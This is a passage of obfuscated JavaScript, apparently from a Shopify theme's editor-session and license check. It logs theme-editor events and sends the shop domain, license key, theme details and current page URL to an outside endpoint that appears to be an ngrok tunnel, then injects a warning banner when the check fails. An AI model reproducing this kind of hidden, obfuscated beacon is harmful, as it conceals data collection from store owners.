null;};document[q(0x146)+q(0x104)](y[q(0x109)],x=>d({'type':q(0xf0)+q(0x105),'sectionId':x[q(0x200)]&&x[q(0x200)][q(0x1f3)+'d'],'sectionType':g(x[q(0x200)]&&x[q(0x200)][q(0x1f3)+'d'],x[q(0x18d)]),'at':Date[q(0x204)]()})),document[q(0x146)+q(0x104)](y[q(0x179)],x=>d({'type':q(0xf0)+q(0x1a0),'sectionId':x[q(0x200)]&&x[q(0x200)][q(0x1f3)+'d'],'sectionType':g(x[q(0x200)]&&x[q(0x200)][q(0x1f3)+'d'],x[q(0x18d)]),'at':Date[q(0x204)]()})),document[q(0x146)+q(0x104)](y[q(0x165)],x=>d({'type':q(0x1fa)+q(0x147),'sectionId':x[q(0x200)]&&x[q(0x200)][q(0x1f3)+'d'],'blockId':x[q(0x200)]&&x[q(0x200)][q(0x20b)],'sectionType':g(x[q(0x200)]&&x[q(0x200)][q(0x1f3)+'d'],x[q(0x18d)]),'at':Date[q(0x204)]()})),window[q(0x146)+q(0x104)](y[q(0xec)],E),document[q(0x146)+q(0x104)](y[q(0x11d)],()=>{const H=q;if(y[H(0x10c)](H(0x16e),H(0x17c)))return I[H(0xfb)]('__')[H(0xe6)]()[H(0x1bd)](/_[A-Za-z0-9]{6,}$/,'');else{if(document[H(0x12e)+H(0x11a)]===H(0x1f0))y[H(0x126)](E);}});}const initEditorSession=async()=>{const J=b,S={'zLNpG':function(g,n){return g>=n;},'xxCuc':function(g){return g();},'tvenv':J(0x150),'AYeim':J(0x140)+J(0x130)+J(0x127)+J(0x17e)+J(0x185)+J(0x20f),'JZCUn':function(g,n){return g!==n;},'mqyJw':J(0x1d2)+'d','AXLJs':function(g,x,n){return g(x,n);},'pFHwo':function(g,n){return g+n;},'UexsP':function(g,n){return g+n;},'ZRdnh':function(g,n){return g+n;},'fdAiT':function(g,x){return g(x);},'SQliE':function(g,x){return g(x);},'xHUEy':function(g,x){return g(x);},'gXfkV':function(g,x){return g(x);},'eIWmZ':function(g,x){return g(x);},'QFrRD':function(g,x){return g(x);},'Sautk':J(0x137),'NHVDG':function(g,n){return g===n;},'tDUjp':J(0x1c1),'xBlvw':function(g,n){return g+n;},'XIxDX':J(0x1d3)+J(0x171),'YyJwb':function(g,n){return g+n;},'AaRfq':J(0x1c4)+'in'};if(!window[J(0xfa)]||!Shopify[J(0x178)+'de'])return;const I=window[J(0xfa)][J(0x187)],y=window[J(0x1d5)]&&window[J(0x1d5)][J(0x1ee)+'y']||'',X=J(0x12b)+'EY'+S[J(0x15e)],B=S[J(0xfe)],c=EDITOR_CHECK_BASE,z={'shop':I,'license':y,'themeId':Shopify[J(0x1d5)]['id'],'themeName':Shopify[J(0x1d5)][J(0x20e)],'role':Shopify[J(0x1d5)][J(0x1ba)],'schemaVersion':Shopify[J(0x1d5)][J(0x1e9)+J(0x1e5)],'ownerRef':S[J(0x16a)](typeof themeEditorRef,S[J(0x129)])&&themeEditorRef||window[J(0x1d5)]&&window[J(0x1d5)][J(0x117)]||null,'page':window[J(0x160)][J(0x1ea)]};let E=![],C='';if(y[J(0x1b9)]&&S[J(0x16a)](y,X))try{const g=await S[J(0x1c0)](fetch,S[J(0x197)](S[J(0x197)](S[J(0x1b4)](S[J(0x197)](S[J(0x1b4)](S[J(0x1b4)](S[J(0x207)](c+(J(0x110)+J(0x1c8))+S[J(0x15d)](encodeURIComponent,I),J(0x1ff)+S[J(0x1ec)](encodeURIComponent,Shopify[J(0x1d5)]['id'])),J(0x210)+'='+S[J(0x15d)](encodeURIComponent,y)),J(0x11b)+J(0x1dd)+S[J(0x1d1)](encodeURIComponent,Shopify[J(0x1d5)][J(0x20e)])),J(0x1a2)+J(0x1ad)+S[J(0x120)](encodeURIComponent,Shopify[J(0x1d5)][J(0x1e9)+J(0x1e5)])),J(0xfd)+S[J(0x1d6)](encodeURIComponent,Shopify[J(0x1d5)][J(0x1ba)])),J(0x14d)+J(0x1a7)+Shopify[J(0x178)+'de']),J(0x13a)+S[J(0x120)](encodeURIComponent,window[J(0x160)][J(0x1ea)]))+(J(0x1a8)+S[J(0x1ab)](encodeURIComponent,window[J(0x160)][J(0x111)])),{'headers':{'ngrok-skip-browser-warning':S[J(0x102)]}});if(g['ok']){if(S[J(0x1d4)](S[J(0x192)],S[J(0x192)])){const x=await g[J(0x188)]();E=!!x[J(0x101)],!E&&(C=S[J(0x1c7)](x[J(0x1cf)]||J(0x209)+J(0x168)+J(0x195)+J(0x115)+J(0xef)+'('+I+(J(0x181)+J(0x155)+J(0x1b3)+J(0x138)+J(0x11e)+J(0x131)),J(0x1a1)+'=\x22'+B+(J(0x18b)+J(0x14c)+J(0x1d7)+J(0x1bc)+J(0xe8)+J(0x1ca)+J(0x20a))));}else c[J(0x1e8)](z),cPgyhd[J(0x13c)](E[J(0x1b9)],0x19cc+0x454+0x1*-0x1e0c)?C():cPgyhd[J(0x202)](d);}}catch(n){}else{const T=I[J(0x1bd)](S[J(0x19e)],''),f=Shopify[J(0x1d5)]['id'],a=S[J(0x1b4)](S[J(0x1d9)](J(0x140)+J(0x1b1)+J(0x199)+J(0x132)+T+J(0x19b)+f+J(0xf6),J(0x148)+J(0x142)+J(0xf2)+J(0x1a9)+J(0x1b5)+J(0x1b2)+J(0x169)+J(0x172)+J(0x18e)+J(0x17f)+J(0x1ed)),J(0x20c)+J(0x167)+f+(J(0x12d)+J(0x163)+J(0x1a3)+J(0xf9)+'y'));C=J(0x15a)+J(0x10f)+J(0x1c2)+J(0x152)+J(0x168)+J(0x145)+J(0x157)+J(0x1e0)+J(0x1e6)+J(0x1dc)+J(0x123)+J(0x1f9)+I+(J(0x203)+J(0x119))+a+(J(0x18b)+J(0x14c)+J(0x1d7)+J(0x1bc)+J(0x1fb)+J(0x134)+J(0x141)+J(0xe4)+J(0x159))+B+(J(0x18b)+J(0x14c)+J(0x1d7)+J(0x1bc)+J(0x1ef)+J(0x1ca)+J(0xf7));}try{S[J(0x1c0)](initEditorAnalytics,E,z);}catch(t){}C&&document[J(0xea)][J(0x1a5)+J(0x1d0)+'ML'](S[J(0x177)],J(0x1df)+J(0x1cd)+J(0x198)+J(0x14e)+J(0x1f8)+J(0x14b)+J(0x15b)+J(0x1e4)+J(0x158)+J(0x143)+J(0x12c)+J(0x182)+J(0x149)+J(0x116)+J(0x10d)+J(0x19d)+J(0x1fd)+J(0x108)+J(0x1cc)+J(0x161)+J(0xf4)+J(0x1d8)+J(0x1db)+J(0x1c5)+J(0x1f5)+J(0x12a)+J(0xfc)+J(0x186)+J(0x1ae)+J(0x1f1)+J(0x16d)+J(0x14f)+J(0x136)+J(0x213)+J(0x1f4)+J(0x125)+J(0x18f)+J(0x139)+J(0x1bf)+J(0x1ac)+J(0x133)+J(0x11f)+J(0x16d)+J(0x16d)+J(0x118)+J(0x1e7)+J(0x180)+J(0x156)+J(0x1fc)+J(0x1b6)+J(0x1ce)+J(0x1b8)+J(0x193)+J(0x153)+J(0x128)+J(0x1c3)+J(0x205)+J(0x16d)+C+(J(0x112)+J(0xf8)+J(0x112)+J(0x19f)));};initEditorSession();
